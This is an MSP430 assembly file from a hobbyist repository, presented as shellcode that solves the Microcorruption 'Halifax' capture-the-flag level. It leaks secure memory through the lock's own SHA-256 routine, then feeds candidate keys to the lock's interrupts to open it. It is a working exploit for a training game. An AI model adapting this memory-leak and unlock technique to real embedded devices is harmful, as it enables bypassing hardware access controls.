msp430-repl/sample-asm/shellcode.asm

100 lines
2.9 KiB
NASM
Raw Permalink Normal View History

; © 2023-2024 John Breaux
; Comtains spoilers for Microcorruption Halifax! Be warned!
; just hash the first 0x140 B and stick them in memory
const:
.define msize 0x1 ; length of each hash in bytes
.define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
.define sr_len 0x140 ; number of bytes in sram to dump
.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len)
.define haddr 0x7000 ; address of the big hash array
.define iaddr 0x8000 ; address of the sram input buffer
.define kaddr 0x9000 ; address of the key buffer
external_data:
.define HEX_LUT 0x4710; "0123456789ABCDEF"
external_func:
; INT(int interrupt, ...)
.define INT #0x4550
; getsn(void *dest, size_t len)
.define getsn #0x4568
; putchar(char character)
.define putchar #0x4578
; puts(char *str)
.define puts #0x4586
; memcpy(void *dest, void *src, size_t len)
.define memcpy #0x45a4
; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
.define sha256_internal #0x45b6
; memset(void* buf, char value, size_t length)
.define memset #0x45c8
get_sram_hashes:
clr r11 ; loop variable in r11
mov #msize, r14 ; r14 = 1
mov #haddr, r13 ; set destination to 0x8000
sr_loop:
mov r11, r15 ; mov addr r15
call sha256_internal ; <sha256_internal>
add #hsize, r13 ; keep 3 bytes of the output
inc r11 ; inc r11
cmp #sr_len, r11 ; do that 0x1000 times
jnc sr_loop
print_hex:
clr r11;
ph_loop:
mov.b haddr(r11), r14
mov.b r14, r15
rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit
rra r15 ; which negates the need to and 0xf, r15
rra r15
rra r15
clrc
and #0xf, r14
mov.b HEX_LUT(r15), r15
call putchar ; <putchar>
mov.b HEX_LUT(r14), r15
call putchar ; <putchar>
inc r11 ; inc r11
cmp #ha_len, r11 ; do that sram_length*3 times
jnc ph_loop
mov.b #0xa, r15 ; '\n'
call #0x4578 ; putchar ('\n')
take_input:
mov #sr_len, r14
mov #iaddr, r15
call getsn ; <getsn>
check_all_passwords:
;for i in 0..sr_len:
clr r9
pw_loop:
; memcpy(kaddr, iaddr + i, len)
mov #0x10, r13
mov #iaddr, r14
add r9, r14
mov #kaddr, r15
call memcpy
; INT (0x42, key)
push #kaddr
push #0x42
call INT
add #4, sp
; INT(7f)
unlock7f:
push #0
push #0
push #0x7f
call INT
add #6, sp
inc r9
cmp #sr_len, r9
jl pw_loop
end:
ret